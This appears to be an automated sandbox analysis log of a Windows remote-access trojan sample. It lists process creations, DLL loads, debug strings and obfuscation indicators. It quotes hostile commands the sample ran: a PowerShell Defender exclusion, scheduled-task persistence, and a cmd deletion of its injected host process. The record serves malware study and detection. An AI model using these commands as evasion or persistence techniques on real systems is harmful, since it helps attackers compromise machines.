Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KfYvtUBOq.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp89CA.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe C:\Users\user\AppData\Roaming\KfYvtUBOq.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp9563.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autoconv.exe "C:\Windows\SysWOW64\autoconv.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autochk.exe "C:\Windows\SysWOW64\autochk.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KfYvtUBOq.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp89CA.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp9563.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autoconv.exe "C:\Windows\SysWOW64\autoconv.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autochk.exe "C:\Windows\SysWOW64\autochk.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: RegSvcs.pdb, source: explorer.exe, 00000009.00000002.4590979961.00000000108EF000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4572804432.000000000515F000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4570178116.0000000002E72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000D.00000002.2203912314.0000000001210000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.2199275035.00000000048AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.2203034931.0000000004A5B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004C10000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004DAE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004CBE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2209210659.00000000047CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2212610111.000000000497A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: RegSvcs.exe, 00000007.00000002.2210069743.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203786383.0000000001150000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203216556.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000F.00000002.4569435978.0000000000720000.00000040.80000000.00040000.00000000.sdmp, rundll32.exe, 00000011.00000002.2215447708.0000000000720000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000D.00000002.2203912314.0000000001210000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000F.00000003.2199275035.00000000048AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.2203034931.0000000004A5B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004C10000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004DAE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004CBE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2209210659.00000000047CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2212610111.000000000497A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: RegSvcs.exe, 00000007.00000002.2210069743.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203786383.0000000001150000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203216556.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4569435978.0000000000720000.00000040.80000000.00040000.00000000.sdmp, rundll32.exe, 00000011.00000002.2215447708.0000000000720000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: dKJy.pdbSHA256 source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, KfYvtUBOq.exe.0.dr
Source:	Binary string: RegSvcs.pdb source: explorer.exe, 00000009.00000002.4590979961.00000000108EF000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4572804432.000000000515F000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4570178116.0000000002E72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dKJy.pdb source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, KfYvtUBOq.exe.0.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, frmMain.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: KfYvtUBOq.exe.0.dr, frmMain.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.2dc7c64.0.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.2dc7c64.0.raw.unpack, PingPong.cs	.Net Code: Justy
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, veEdTsXssh4eIG99SL.cs	.Net Code: MCrQY8I1jG System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, veEdTsXssh4eIG99SL.cs	.Net Code: MCrQY8I1jG System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.57d0000.3.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.57d0000.3.raw.unpack, PingPong.cs	.Net Code: Justy
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, veEdTsXssh4eIG99SL.cs	.Net Code: MCrQY8I1jG System.Reflection.Assembly.Load(byte[])
Source: 8.2.KfYvtUBOq.exe.2d77bc8.0.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 8.2.KfYvtUBOq.exe.2d77bc8.0.raw.unpack, PingPong.cs	.Net Code: Justy

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_0730B09D push ebp; retf	0_2_0730B09E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_0730D0E8 pushfd ; ret	0_2_0730D0E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011309AD push ecx; mov dword ptr [esp], ecx	7_2_011309B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0110135E push eax; iretd	7_2_01101369
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01101FEC push eax; iretd	7_2_01101FED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01187E99 push ecx; ret	7_2_01187EAC
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_0730D271 push ss; retf	8_2_0730D277
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_0730B09D push ebp; retf	8_2_0730B09E
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_073B1C70 push eax; retf	8_2_073B1C71
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_073B1C90 pushad ; retf	8_2_073B1C91
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_073BAB00 push eax; mov dword ptr [esp], ecx	8_2_073BAB04
